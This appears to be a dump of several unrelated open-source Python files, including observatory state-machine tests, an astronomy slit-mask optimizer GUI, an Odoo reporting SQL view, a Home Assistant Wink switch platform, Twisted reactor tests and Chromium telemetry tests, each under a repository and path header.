    pocs.observatory.scheduler.clear_available_observations()
    assert pocs.is_initialized is True
    pocs.run(exit_when_done=True, run_once=True)
    assert pocs.state == 'sleeping'
def test_pocs_park_to_ready_with_observations(pocs):
    """Walk the state machine sleeping -> ready -> scheduling -> parking -> parked -> ready."""
    # We don't want to run_once here
    pocs.run_once = False
    assert pocs.is_safe() is True
    assert pocs.state == 'sleeping'
    pocs.next_state = 'ready'
    assert pocs.initialize()
    assert pocs.goto_next_state()
    assert pocs.state == 'ready'
    assert pocs.goto_next_state()
    assert pocs.state == 'scheduling'
    assert pocs.observatory.current_observation is not None
    # Manually set to parking
    pocs.next_state = 'parking'
    assert pocs.goto_next_state()
    assert pocs.state == 'parking'
    assert pocs.observatory.current_observation is None
    assert pocs.observatory.mount.is_parked
    assert pocs.goto_next_state()
    assert pocs.state == 'parked'
    # Should be safe and still have valid observations so next state should be ready
    assert pocs.goto_next_state()
    assert pocs.state == 'ready'
    pocs.power_down()
    assert pocs.connected is False
def test_pocs_park_to_ready_without_observations(pocs):
    """With no observations left, 'parked' stays parked instead of returning to 'ready'."""
    os.environ['POCSTIME'] = '2020-01-01 08:00:00'
    pocs.logger.warning('Inserting safe weather reading')
    pocs.db.insert_current('weather', {'safe': True})
    assert pocs.is_safe() is True
    assert pocs.state == 'sleeping'
    pocs.next_state = 'ready'
    assert pocs.initialize()
    pocs.logger.warning('Moving to ready')
    assert pocs.goto_next_state()
    assert pocs.state == 'ready'
    pocs.logger.warning('Moving to scheduling')
    assert pocs.goto_next_state()
    assert pocs.observatory.current_observation is not None
    pocs.next_state = 'parking'
    pocs.logger.warning('Moving to parking')
    assert pocs.goto_next_state()
    assert pocs.state == 'parking'
    assert pocs.observatory.current_observation is None
    assert pocs.observatory.mount.is_parked
    # No valid obs
    pocs.observatory.scheduler.clear_available_observations()
    pocs.interrupted = True
    assert pocs.goto_next_state()
    assert pocs.state == 'parked'
    pocs.power_down()
    assert pocs.connected is False
    assert pocs.is_safe() is False
def test_run_wait_until_safe(observatory, valid_observation_day, pocstime_day, pocstime_night):
    """A run started in daytime waits, then proceeds once POCSTIME turns to night."""
    os.environ['POCSTIME'] = pocstime_day
    # Remove the night simulator so darkness tracks POCSTIME. (The original
    # comment mentioned the weather simulator, but the code removes 'night';
    # weather stays simulated and therefore safe.)
    observatory.set_config('simulator', hardware.get_all_names(without=['night']))
    pocs = POCS(observatory)
    pocs.set_config('wait_delay', 5)  # Check safety every 5 seconds.
    pocs.observatory.scheduler.clear_available_observations()
    pocs.observatory.scheduler.add_observation(valid_observation_day)
    assert pocs.connected is True
    assert pocs.is_initialized is False
    pocs.initialize()
    pocs.logger.info('Starting observatory run')
    # Not dark yet; unit is initialized and connected but no state is set.
    assert not pocs.is_dark()
    assert pocs.is_initialized
    assert pocs.connected
    assert pocs.do_states
    assert pocs.next_state is None
    pocs.set_config('wait_delay', 1)
    def start_pocs():
        # Start running, BLOCKING.
        pocs.logger.info('start_pocs ENTER')
        pocs.run(run_once=True, exit_when_done=True)
        # After done running.
        assert pocs.is_weather_safe() is True
        pocs.power_down()
        observatory.logger.info('start_pocs EXIT')
    pocs_thread = threading.Thread(target=start_pocs, daemon=True)
    pocs_thread.start()
    assert pocs.is_safe(park_if_not_safe=False) is False
    # Wait to pretend we're waiting for horizon
    time.sleep(5)
    os.environ['POCSTIME'] = pocstime_night
    assert pocs.is_dark()
    pocs.logger.warning('Waiting to get to slewing state...')
    while pocs.next_state != 'slewing':
        time.sleep(1)
    pocs.logger.warning('Stopping states via pocs.DO_STATES')
    observatory.set_config('pocs.DO_STATES', False)
    observatory.logger.warning('Waiting on pocs_thread')
    pocs_thread.join(timeout=300)
    assert pocs_thread.is_alive() is False
def test_unsafe_park(observatory, valid_observation, pocstime_night):
    """POCS must transition to parking when the weather turns unsafe mid-run."""
    os.environ['POCSTIME'] = pocstime_night
    # Remove the night AND weather simulators so darkness follows POCSTIME and
    # weather safety follows the database records inserted below.
    observatory.set_config('simulator', hardware.get_all_names(without=['night', 'weather']))
    pocs = POCS(observatory)
    pocs.set_config('wait_delay', 5)  # Check safety every 5 seconds.
    pocs.observatory.scheduler.clear_available_observations()
    pocs.observatory.scheduler.add_observation(valid_observation)
    observatory.logger.warning('Inserting safe weather reading')
    observatory.db.insert_current('weather', {'safe': True})
    assert pocs.connected is True
    assert pocs.is_initialized is False
    pocs.initialize()
    pocs.logger.info('Starting observatory run')
    # Everything is currently safe; unit is connected but no state is set yet.
    assert pocs.is_safe()
    assert pocs.is_initialized
    assert pocs.connected
    assert pocs.do_states
    assert pocs.next_state is None
    pocs.set_config('wait_delay', 1)

    def start_pocs():
        # Start running, BLOCKING.
        pocs.logger.info('start_pocs ENTER')
        pocs.run(run_once=True, exit_when_done=True)
        # After the run finishes the bad weather record must have been seen.
        assert pocs.is_weather_safe() is False
        pocs.power_down()
        observatory.logger.info('start_pocs EXIT')

    pocs_thread = threading.Thread(target=start_pocs, daemon=True)
    pocs_thread.start()
    # Insert bad weather report while slewing
    pocs.logger.info('Waiting to get to slewing state...')
    while pocs.state != "slewing":
        # Short sleep instead of the original `pass` busy-wait, which pegged a
        # CPU core while the run thread was working.
        time.sleep(0.01)
    pocs.logger.info("Inserting bad weather record.")
    observatory.db.insert_current('weather', {'safe': False})
    # No longer safe, so should transition to parking
    pocs.logger.info('Waiting to get to parked state...')
    while True:
        if pocs.state in ['parking', 'parked']:
            break
        assert pocs.state in ["slewing", "parking", "parked"]  # Should be one of these states
        time.sleep(0.5)
    pocs.logger.warning('Stopping states via pocs.DO_STATES')
    observatory.set_config('pocs.DO_STATES', False)
    observatory.logger.warning('Waiting on pocs_thread')
    pocs_thread.join(timeout=300)
    assert pocs_thread.is_alive() is False
def test_run_power_down_interrupt(observatory,
                                  valid_observation,
                                  pocstime_night
                                  ):
    """Disabling DO_STATES while slewing stops the run cleanly."""
    os.environ['POCSTIME'] = pocstime_night
    observatory.logger.info('start_pocs ENTER')
    # Use all simulators so the run can proceed without hardware. (The
    # original comment claimed the weather simulator was removed; it is not.)
    observatory.set_config('simulator', 'all')
    pocs = POCS(observatory)
    pocs.set_config('wait_delay', 5)  # Check safety every 5 seconds.
    pocs.observatory.scheduler.clear_available_observations()
    pocs.observatory.scheduler.add_observation(valid_observation)
    pocs.initialize()
    pocs.logger.info('Starting observatory run')
    # Unit is connected and initialized; no state set yet.
    assert pocs.connected
    assert pocs.do_states
    assert pocs.is_initialized
    assert pocs.next_state is None
    def start_pocs():
        observatory.logger.info('start_pocs ENTER')
        pocs.run(exit_when_done=True, run_once=True)
        pocs.power_down()
        observatory.logger.info('start_pocs EXIT')
    pocs_thread = threading.Thread(target=start_pocs, daemon=True)
    pocs_thread.start()
    while pocs.next_state != 'slewing':
        pocs.logger.debug(
            f'Waiting to get to slewing state. Currently next_state={pocs.next_state}')
        time.sleep(1)
    pocs.logger.warning('Stopping states via pocs.DO_STATES')
    observatory.set_config('pocs.DO_STATES', False)
    observatory.logger.debug('Waiting on pocs_thread')
    pocs_thread.join(timeout=300)
    assert pocs_thread.is_alive() is False
def test_custom_state_file(observatory, temp_file, config_host, config_port):
    """POCS accepts a state-machine definition loaded from a custom YAML file."""
    state_table = POCS.load_state_table()
    assert isinstance(state_table, dict)
    with open(temp_file, 'w') as f:
        f.write(to_yaml(state_table))
    file_path = os.path.abspath(temp_file)
    pocs = POCS(observatory, state_machine_file=file_path, run_once=True, simulators=['power'])
    pocs.initialize()
    pocs.power_down()
    reset_conf(config_host, config_port)
def test_free_space(pocs, caplog):
    """An impossible free-space requirement fails and logs an ERROR."""
    assert pocs.has_free_space()
    assert pocs.has_free_space(required_space=999 * u.terabyte) is False
    assert 'No disk space' in caplog.records[-1].message
    assert caplog.records[-1].levelname == 'ERROR'
def test_run_complete(pocs, valid_observation):
    """A full single run with one observation ends back in 'sleeping'."""
    os.environ['POCSTIME'] = '2020-01-01 08:00:00'
    pocs.set_config('simulator', 'all')
    pocs.observatory.scheduler.clear_available_observations()
    pocs.observatory.scheduler.add_observation(valid_observation)
    pocs.initialize()
    assert pocs.is_initialized is True
    pocs.run(exit_when_done=True, run_once=True)
    assert pocs.state == 'sleeping'
    pocs.power_down()
|
crawfordsm/pysalt | refs/heads/placeholder | proptools/optimizetab.py | 2 | # -*- coding: utf-8 -*-
import os, sys
import numpy as np
from PyQt4 import QtCore, QtGui
from slitlets import Slitlets
import pyslit_optimize as opt
class OptimizeTab:
    """Controller for the slit-mask optimizer tab of the GUI.

    Holds the optimizer parameters (y spacing, iteration count) edited through
    the Qt line-edit widgets, and runs the slit optimizer over the objects
    inside the mask's field of view.
    """
    def __init__(self, ui, default_yspacing=1., default_iter=10):
        print('loading OPT')
        self.ui = ui
        self.slitlets = Slitlets()
        self.opt_yspacing = default_yspacing
        self.opt_niter = default_iter
    def setoptimizer_yspacing(self):
        # checkyspacing_input always returns a positive float (the default on
        # bad input), so this assignment can no longer set None.
        self.opt_yspacing = self.checkyspacing_input(self.ui.lineEditOpt_Yspacing.text())
    def setoptimizer_iter(self):
        self.opt_niter = self.checkniter_input(self.ui.lineEditOpt_Niter.text())
    def includerefstars(self):
        """Show the number of available reference stars (priority == -1)."""
        if self.ui.checkBoxOpt_IncRefstars.isChecked():
            nrefstars = len(np.where(self.slitlets.data['priority'] == -1)[0])
            self.ui.lineEditOpt_AllRefstars.setText(str(nrefstars))
        else:
            self.ui.lineEditOpt_AllRefstars.setText('')
    def setnumrefstars(self):
        print(self.ui.lineEditOpt_NumRefstars.text())
    def optimize(self):
        """Run the optimizer program and optimize the slits"""
        msg = "Optimize the Slitlets"
        print(msg)
        # NOTE(review): self.slitmask is not set in __init__; it is assumed to
        # be assigned externally before optimize() is called -- confirm.
        cra = self.slitmask.center_ra
        cdec = self.slitmask.center_dec
        rotang = self.slitmask.position_angle
        equinox = 2000
        is_in_fov = np.where(self.slitlets.data['fov_flag'] == 1)[0]
        # jpk: this will need to be added in the next version
        # is_in_fov = np.where((self.slitlets.data['inmask_flag'] == 1) * (self.slitlets.data['fov_flag'] == 1))[0]
        ra = self.slitlets.data['targ_ra']
        dec = self.slitlets.data['targ_dec']
        pri = self.slitlets.data['priority']
        slen = self.slitlets.data['len1'] + self.slitlets.data['len2']
        swid = self.slitlets.data['width']
        stilt = self.slitlets.data['tilt']
        Nstars_req = 0.  # **** Paul: I'm not quite sure where to get this from ****
        # Use the iteration count configured through the UI instead of the
        # previous hard-coded value of 10.
        Niter = self.opt_niter
        # set all inmask flags to zero before running optimiser
        #self.slitlets.emptymask()
        # -- only run this on objects within FOV:
        ok = is_in_fov
        if not ok.any():
            print("No objects in the field of view--update mask center and run again")
            return
        print(ra[ok])
        tra = ra[ok]
        tdec = dec[ok]
        tpri = pri[ok]
        tslen = slen[ok]
        tswid = swid[ok]
        tstilt = stilt[ok]
        print('running optimizer')
        tin_mask = opt.pyslit_optimize(cra, cdec, rotang, equinox, tra, tdec, \
                                       tpri, tslen, tswid, tstilt, \
                                       Niter, self.opt_yspacing, Nstars_req)
        # apply index numbers to full list:
        in_mask = ok[tin_mask]
        # reset all the in_mask values, otherwise the objects which should not
        # be in the optimized mask will still have a in_mask flag
        self.slitlets.data['inmask_flag'] = 0
        self.slitlets.data['collision_flag'] = 0
        # now add the in_mask flag to the sources which was found by the
        # optimizer
        for sid in in_mask:
            self.slitlets.addtomask(sid)
        self.updatetabs()
    def updatetabs(self):
        """Refresh FoV/collision flags after the mask contents changed."""
        self.slitmask.outFoV_all()
        self.slitmask.find_collisions()
        self.slitlets.update_flags()
        # pass
    def checkyspacing_input(self, x):
        """Parse x as a positive float.

        On invalid or non-positive input, reset the UI field to the default
        spacing of 1 and return it. (Bug fix: the original returned None in
        the error paths, and the caller then overwrote self.opt_yspacing
        with None.)
        """
        try:
            val = float(x)
            if val > 0:
                return val
        except ValueError:
            pass
        self.opt_yspacing = 1
        self.ui.lineEditOpt_Yspacing.setText(str(self.opt_yspacing))
        return self.opt_yspacing
    def checkniter_input(self, x):
        """Parse x as a positive int.

        On invalid or non-positive input, reset the UI field to the default
        of 10 iterations and return it (same None-return bug fix as above).
        """
        try:
            val = int(x)
            if val > 0:
                return val
        except ValueError:
            pass
        self.opt_niter = 10
        self.ui.lineEditOpt_Niter.setText(str(self.opt_niter))
        return self.opt_niter
|
chiragjogi/odoo | refs/heads/8.0 | addons/project/report/project_report.py | 279 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp import tools
class report_project_task_user(osv.osv):
    # Read-only reporting model backed by a SQL view (one row per active
    # project task); _auto = False prevents ORM table creation.
    _name = "report.project.task.user"
    _description = "Tasks by user and project"
    _auto = False
    _columns = {
        'name': fields.char('Task Summary', readonly=True),
        'user_id': fields.many2one('res.users', 'Assigned To', readonly=True),
        'reviewer_id': fields.many2one('res.users', 'Reviewer', readonly=True),
        'date_start': fields.datetime('Assignation Date', readonly=True),
        'no_of_days': fields.integer('# of Days', size=128, readonly=True),
        'date_end': fields.datetime('Ending Date', readonly=True),
        'date_deadline': fields.date('Deadline', readonly=True),
        'date_last_stage_update': fields.datetime('Last Stage Update', readonly=True),
        'project_id': fields.many2one('project.project', 'Project', readonly=True),
        'hours_planned': fields.float('Planned Hours', readonly=True),
        'hours_effective': fields.float('Effective Hours', readonly=True),
        'hours_delay': fields.float('Avg. Plan.-Eff.', readonly=True),
        'remaining_hours': fields.float('Remaining Hours', readonly=True),
        'progress': fields.float('Progress', readonly=True, group_operator='avg'),
        'total_hours': fields.float('Total Hours', readonly=True),
        'closing_days': fields.float('Days to Close', digits=(16,2), readonly=True, group_operator="avg",
                                     help="Number of Days to close the task"),
        'opening_days': fields.float('Days to Assign', digits=(16,2), readonly=True, group_operator="avg",
                                     help="Number of Days to Open the task"),
        'delay_endings_days': fields.float('Overpassed Deadline', digits=(16,2), readonly=True),
        'nbr': fields.integer('# of Tasks', readonly=True),  # TDE FIXME master: rename into nbr_tasks
        'priority': fields.selection([('0','Low'), ('1','Normal'), ('2','High')],
                                     string='Priority', size=1, readonly=True),
        'state': fields.selection([('normal', 'In Progress'),('blocked', 'Blocked'),('done', 'Ready for next stage')],'Status', readonly=True),
        'company_id': fields.many2one('res.company', 'Company', readonly=True),
        'partner_id': fields.many2one('res.partner', 'Contact', readonly=True),
        'stage_id': fields.many2one('project.task.type', 'Stage'),
    }
    _order = 'name desc, project_id'
    def init(self, cr):
        # (Re)build the SQL view at module install/update time. All day-count
        # columns are computed from epoch differences; 'nbr' is a constant 1
        # per row so SUM(nbr) counts tasks when grouped.
        tools.sql.drop_view_if_exists(cr, 'report_project_task_user')
        cr.execute("""
            CREATE view report_project_task_user as
              SELECT
                    (select 1 ) AS nbr,
                    t.id as id,
                    t.date_start as date_start,
                    t.date_end as date_end,
                    t.date_last_stage_update as date_last_stage_update,
                    t.date_deadline as date_deadline,
                    abs((extract('epoch' from (t.write_date-t.date_start)))/(3600*24)) as no_of_days,
                    t.user_id,
                    t.reviewer_id,
                    progress as progress,
                    t.project_id,
                    t.effective_hours as hours_effective,
                    t.priority,
                    t.name as name,
                    t.company_id,
                    t.partner_id,
                    t.stage_id as stage_id,
                    t.kanban_state as state,
                    remaining_hours as remaining_hours,
                    total_hours as total_hours,
                    t.delay_hours as hours_delay,
                    planned_hours as hours_planned,
                    (extract('epoch' from (t.write_date-t.create_date)))/(3600*24) as closing_days,
                    (extract('epoch' from (t.date_start-t.create_date)))/(3600*24) as opening_days,
                    (extract('epoch' from (t.date_deadline-(now() at time zone 'UTC'))))/(3600*24) as delay_endings_days
              FROM project_task t
                WHERE t.active = 'true'
                GROUP BY
                    t.id,
                    remaining_hours,
                    t.effective_hours,
                    progress,
                    total_hours,
                    planned_hours,
                    hours_delay,
                    create_date,
                    write_date,
                    date_start,
                    date_end,
                    date_deadline,
                    date_last_stage_update,
                    t.user_id,
                    t.reviewer_id,
                    t.project_id,
                    t.priority,
                    name,
                    t.company_id,
                    t.partner_id,
                    stage_id
        """)
|
toontownfunserver/Panda3D-1.9.0 | refs/heads/master | direct/task/__init__.py | 12133432 | |
swirlingsand/self-driving-car-nanodegree-nd013 | refs/heads/master | p4-CarND-Advanced-Lane-Lines/__init__.py | 12133432 | |
shanemcd/ansible | refs/heads/devel | test/integration/targets/module_utils/module_utils/spam5/__init__.py | 12133432 | |
philanthropy-u/edx-platform | refs/heads/master | openedx/core/djangoapps/user_api/course_tag/__init__.py | 12133432 | |
rubencabrera/micropython | refs/heads/master | tests/cmdline/repl_basic.py | 52 | # basic REPL tests
print(1)
[A
|
aptana/Pydev | refs/heads/development | bundles/org.python.pydev.jython/Lib/email/Errors.py | 11 | # Copyright (C) 2001,2002 Python Software Foundation
# Author: barry@zope.com (Barry Warsaw)
"""email package exception classes.
"""
class MessageError(Exception):
    """Base class for all exceptions raised by the email package."""
    pass


class MessageParseError(MessageError):
    """Base class for errors raised while parsing a message."""
    pass


class HeaderParseError(MessageParseError):
    """Raised when a message's headers cannot be parsed."""
    pass


class BoundaryError(MessageParseError):
    """Raised when the terminating MIME boundary cannot be found."""
    pass


class MultipartConversionError(MessageError, TypeError):
    """Raised on an attempt to convert a message to multipart when that is
    prohibited; also a TypeError so type-based handlers catch it."""
    pass
|
alexkolar/home-assistant | refs/heads/dev | homeassistant/components/switch/wink.py | 10 | """
homeassistant.components.switch.wink
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Support for Wink switches.
"""
import logging
from homeassistant.components.wink import WinkToggleDevice
from homeassistant.const import CONF_ACCESS_TOKEN
REQUIREMENTS = ['https://github.com/balloob/python-wink/archive/'
'c2b700e8ca866159566ecf5e644d9c297f69f257.zip'
'#python-wink==0.1']
def setup_platform(hass, config, add_devices, discovery_info=None):
    """Set up the Wink switch platform and add one device per Wink switch."""
    import pywink
    if discovery_info is None:
        # Not set up via discovery: an access token is required in the config.
        token = config.get(CONF_ACCESS_TOKEN)
        if token is None:
            logging.getLogger(__name__).error(
                "Missing wink access_token - "
                "get one at https://winkbearertoken.appspot.com/")
            return
        pywink.set_bearer_token(token)
    # When discovered, the bearer token is assumed to be set already -- confirm.
    add_devices(WinkToggleDevice(switch) for switch in pywink.get_switches())
|
mspark93/VTK | refs/heads/master | ThirdParty/Twisted/twisted/internet/test/test_posixbase.py | 33 | # Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.internet.posixbase} and supporting code.
"""
from __future__ import division, absolute_import
from twisted.python.compat import _PY3
from twisted.trial.unittest import TestCase
from twisted.internet.defer import Deferred
from twisted.internet.posixbase import PosixReactorBase, _Waker
from twisted.internet.protocol import ServerFactory
skipSockets = None
if _PY3:
skipSockets = "Re-enable when Python 3 port supports AF_UNIX"
else:
try:
from twisted.internet import unix
from twisted.test.test_unix import ClientProto
except ImportError:
skipSockets = "Platform does not support AF_UNIX sockets"
from twisted.internet.tcp import Port
from twisted.internet import reactor
class TrivialReactor(PosixReactorBase):
    """A minimal concrete PosixReactorBase that only records the readers and
    writers it is given; dicts are used as sets so tests can inspect them."""
    def __init__(self):
        self._readers = {}
        self._writers = {}
        # Base __init__ runs after the dicts exist: it installs the waker,
        # which calls addReader below.
        PosixReactorBase.__init__(self)
    def addReader(self, reader):
        self._readers[reader] = True
    def removeReader(self, reader):
        del self._readers[reader]
    def addWriter(self, writer):
        self._writers[writer] = True
    def removeWriter(self, writer):
        del self._writers[writer]
class PosixReactorBaseTests(TestCase):
    """
    Tests for L{PosixReactorBase}.
    """
    def _checkWaker(self, reactor):
        """
        Assert the reactor's waker exists and is registered both as an
        internal reader and an ordinary reader.
        """
        self.assertIsInstance(reactor.waker, _Waker)
        self.assertIn(reactor.waker, reactor._internalReaders)
        self.assertIn(reactor.waker, reactor._readers)
    def test_wakerIsInternalReader(self):
        """
        When L{PosixReactorBase} is instantiated, it creates a waker and adds
        it to its internal readers set.
        """
        reactor = TrivialReactor()
        self._checkWaker(reactor)
    def test_removeAllSkipsInternalReaders(self):
        """
        Any L{IReadDescriptors} in L{PosixReactorBase._internalReaders} are
        left alone by L{PosixReactorBase._removeAll}.
        """
        reactor = TrivialReactor()
        extra = object()
        reactor._internalReaders.add(extra)
        reactor.addReader(extra)
        reactor._removeAll(reactor._readers, reactor._writers)
        self._checkWaker(reactor)
        self.assertIn(extra, reactor._internalReaders)
        self.assertIn(extra, reactor._readers)
    def test_removeAllReturnsRemovedDescriptors(self):
        """
        L{PosixReactorBase._removeAll} returns a list of removed
        L{IReadDescriptor} and L{IWriteDescriptor} objects.
        """
        reactor = TrivialReactor()
        reader = object()
        writer = object()
        reactor.addReader(reader)
        reactor.addWriter(writer)
        removed = reactor._removeAll(
            reactor._readers, reactor._writers)
        self.assertEqual(set(removed), set([reader, writer]))
        self.assertNotIn(reader, reactor._readers)
        self.assertNotIn(writer, reactor._writers)
class TCPPortTests(TestCase):
    """
    Tests for L{twisted.internet.tcp.Port}.
    """
    if not isinstance(reactor, PosixReactorBase):
        skip = "Non-posixbase reactor"
    def test_connectionLostFailed(self):
        """
        L{Port.stopListening} returns a L{Deferred} which errbacks if
        L{Port.connectionLost} raises an exception.
        """
        port = Port(12345, ServerFactory())
        port.connected = True
        # 1 // 0 deliberately raises ZeroDivisionError when connectionLost runs.
        port.connectionLost = lambda reason: 1 // 0
        return self.assertFailure(port.stopListening(), ZeroDivisionError)
class TimeoutReportReactor(PosixReactorBase):
    """
    A reactor which is just barely runnable and which cannot monitor any
    readers or writers, and which fires a L{Deferred} with the timeout
    passed to its C{doIteration} method as soon as that method is invoked.
    """
    def __init__(self):
        PosixReactorBase.__init__(self)
        # Fired (once) with the first doIteration timeout value.
        self.iterationTimeout = Deferred()
        # Deterministic "current time" returned by seconds(); tests mutate it.
        self.now = 100
    def addReader(self, reader):
        """
        Ignore the reader.  This is necessary because the waker will be
        added.  However, we won't actually monitor it for any events.
        """
    def removeAll(self):
        """
        There are no readers or writers, so there is nothing to remove.
        This will be called when the reactor stops, though, so it must be
        implemented.
        """
        return []
    def seconds(self):
        """
        Override the real clock with a deterministic one that can be easily
        controlled in a unit test.
        """
        return self.now
    def doIteration(self, timeout):
        # Fire the Deferred only on the first iteration; later iterations are
        # no-ops so the reactor can be stopped from the callback.
        d = self.iterationTimeout
        if d is not None:
            self.iterationTimeout = None
            d.callback(timeout)
class IterationTimeoutTests(TestCase):
    """
    Tests for the timeout argument L{PosixReactorBase.run} calls
    L{PosixReactorBase.doIteration} with in the presence of various delayed
    calls.
    """
    def _checkIterationTimeout(self, reactor):
        # Run the reactor until doIteration reports its timeout, then stop
        # the reactor and return that timeout value.
        reported = []
        reactor.iterationTimeout.addCallback(reported.append)
        reactor.iterationTimeout.addCallback(lambda ignored: reactor.stop())
        reactor.run()
        return reported[0]
    def test_noCalls(self):
        """
        With no delayed calls scheduled, C{doIteration} receives a timeout
        of C{None}.
        """
        self.assertEqual(
            self._checkIterationTimeout(TimeoutReportReactor()), None)
    def test_delayedCall(self):
        """
        With one delayed call scheduled, C{doIteration} receives a timeout
        equal to the time remaining until that call is due.
        """
        reactor = TimeoutReportReactor()
        reactor.callLater(100, lambda: None)
        self.assertEqual(self._checkIterationTimeout(reactor), 100)
    def test_timePasses(self):
        """
        The timeout passed to C{doIteration} shrinks by however much time
        elapses after the delayed call is scheduled.
        """
        reactor = TimeoutReportReactor()
        reactor.callLater(100, lambda: None)
        reactor.now += 25
        self.assertEqual(self._checkIterationTimeout(reactor), 75)
    def test_multipleDelayedCalls(self):
        """
        With several delayed calls scheduled, the soonest one determines
        the timeout passed to C{doIteration}.
        """
        reactor = TimeoutReportReactor()
        for delay in [50, 10, 100]:
            reactor.callLater(delay, lambda: None)
        self.assertEqual(self._checkIterationTimeout(reactor), 10)
    def test_resetDelayedCall(self):
        """
        After a delayed call is reset, the C{doIteration} timeout counts
        down from the moment of the reset using the new delay.
        """
        reactor = TimeoutReportReactor()
        call = reactor.callLater(50, lambda: None)
        reactor.now += 25
        call.reset(15)
        self.assertEqual(self._checkIterationTimeout(reactor), 15)
    def test_delayDelayedCall(self):
        """
        Delaying a delayed call extends the C{doIteration} timeout by the
        extra delay on top of the time already remaining.
        """
        reactor = TimeoutReportReactor()
        call = reactor.callLater(50, lambda: None)
        reactor.now += 10
        call.delay(20)
        self.assertEqual(self._checkIterationTimeout(reactor), 60)
    def test_cancelDelayedCall(self):
        """
        Cancelling the only delayed call restores a C{None} timeout for
        C{doIteration}.
        """
        reactor = TimeoutReportReactor()
        call = reactor.callLater(50, lambda: None)
        call.cancel()
        self.assertEqual(self._checkIterationTimeout(reactor), None)
class ConnectedDatagramPortTestCase(TestCase):
    """
    Test connected datagram UNIX sockets.
    """
    if skipSockets is not None:
        skip = skipSockets
    def test_connectionFailedDoesntCallLoseConnection(self):
        """
        L{ConnectedDatagramPort.connectionFailed} never invokes the
        deprecated C{loseConnection} method.
        """
        def loseConnection():
            """
            Stand-in for the deprecated C{loseConnection}; failing the test
            if it is ever reached.
            """
            self.fail("loseConnection is deprecated and should not get called.")
        port = unix.ConnectedDatagramPort(None, ClientProto())
        port.loseConnection = loseConnection
        port.connectionFailed("goodbye")
    def test_connectionFailedCallsStopListening(self):
        """
        L{ConnectedDatagramPort.connectionFailed} shuts the port down via
        L{ConnectedDatagramPort.stopListening} rather than the deprecated
        C{loseConnection}.
        """
        self.called = False
        def stopListening():
            """
            Stand-in C{stopListening} which records that it was invoked.
            """
            self.called = True
        port = unix.ConnectedDatagramPort(None, ClientProto())
        port.stopListening = stopListening
        port.connectionFailed("goodbye")
        self.assertEqual(self.called, True)
|
ChronoMonochrome/android_external_chromium_org | refs/heads/cm-11.0 | tools/telemetry/telemetry/page/page_set_unittest.py | 25 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import tempfile
import unittest
from telemetry.page import page_set
simple_archive_info = """
{
"archives": {
"data_01.wpr": ["http://www.foo.com/"],
"data_02.wpr": ["http://www.bar.com/"]
}
}
"""
simple_set = """
{"description": "hello",
"archive_data_file": "%s",
"pages": [
{"url": "http://www.foo.com/"},
{"url": "http://www.bar.com/"}
]
}
"""
class TestPageSet(unittest.TestCase):
  def testSimpleSet(self):
    # Write the archive info and the page set to real temporary files,
    # parse the page set, then remove the files before asserting.
    # NOTE(review): if creating f2 raises, the finally block would hit a
    # NameError on f2 — acceptable for a test, but worth confirming.
    try:
      with tempfile.NamedTemporaryFile(delete=False) as f:
        f.write(simple_archive_info)
      with tempfile.NamedTemporaryFile(delete=False) as f2:
        # Escape backslashes so Windows paths survive JSON parsing.
        f2.write(simple_set % f.name.replace('\\', '\\\\'))
      ps = page_set.PageSet.FromFile(f2.name)
    finally:
      os.remove(f.name)
      os.remove(f2.name)
    self.assertEquals('hello', ps.description)
    self.assertEquals(f.name, ps.archive_data_file)
    self.assertEquals(2, len(ps.pages))
    self.assertEquals('http://www.foo.com/', ps.pages[0].url)
    self.assertEquals('http://www.bar.com/', ps.pages[1].url)
    # Each page is matched to its archive via the archive-info mapping.
    self.assertEquals('data_01.wpr', os.path.basename(ps.pages[0].archive_path))
    self.assertEquals('data_02.wpr', os.path.basename(ps.pages[1].archive_path))
  def testServingDirs(self):
    # Serving dirs and per-page serving dirs are resolved relative to the
    # page set's base directory and normalized to real paths.
    directory_path = tempfile.mkdtemp()
    try:
      ps = page_set.PageSet.FromDict({
          'serving_dirs': ['a/b'],
          'pages': [
            {'url': 'file://c/test.html'},
            {'url': 'file://c/test.js'},
            {'url': 'file://d/e/../test.html'},
            ]
          }, directory_path)
    finally:
      os.rmdir(directory_path)
    real_directory_path = os.path.realpath(directory_path)
    expected_serving_dirs = set([os.path.join(real_directory_path, 'a', 'b')])
    self.assertEquals(ps.serving_dirs, expected_serving_dirs)
    self.assertEquals(ps[0].serving_dir, os.path.join(real_directory_path, 'c'))
    # The '..' in the third URL is collapsed during normalization.
    self.assertEquals(ps[2].serving_dir, os.path.join(real_directory_path, 'd'))
|
maestrano/openerp | refs/heads/mno-master | openerp/addons/event_moodle/__init__.py | 54 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import event_moodle
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
thinkopensolutions/geraldo | refs/heads/master | site/newsite/django_1_0/django/core/management/commands/shell.py | 76 | import os
from django.core.management.base import NoArgsCommand
from optparse import make_option
class Command(NoArgsCommand):
    # `manage.py shell`: start an interactive interpreter with the
    # project's models importable.
    option_list = NoArgsCommand.option_list + (
        make_option('--plain', action='store_true', dest='plain',
            help='Tells Django to use plain Python, not IPython.'),
    )
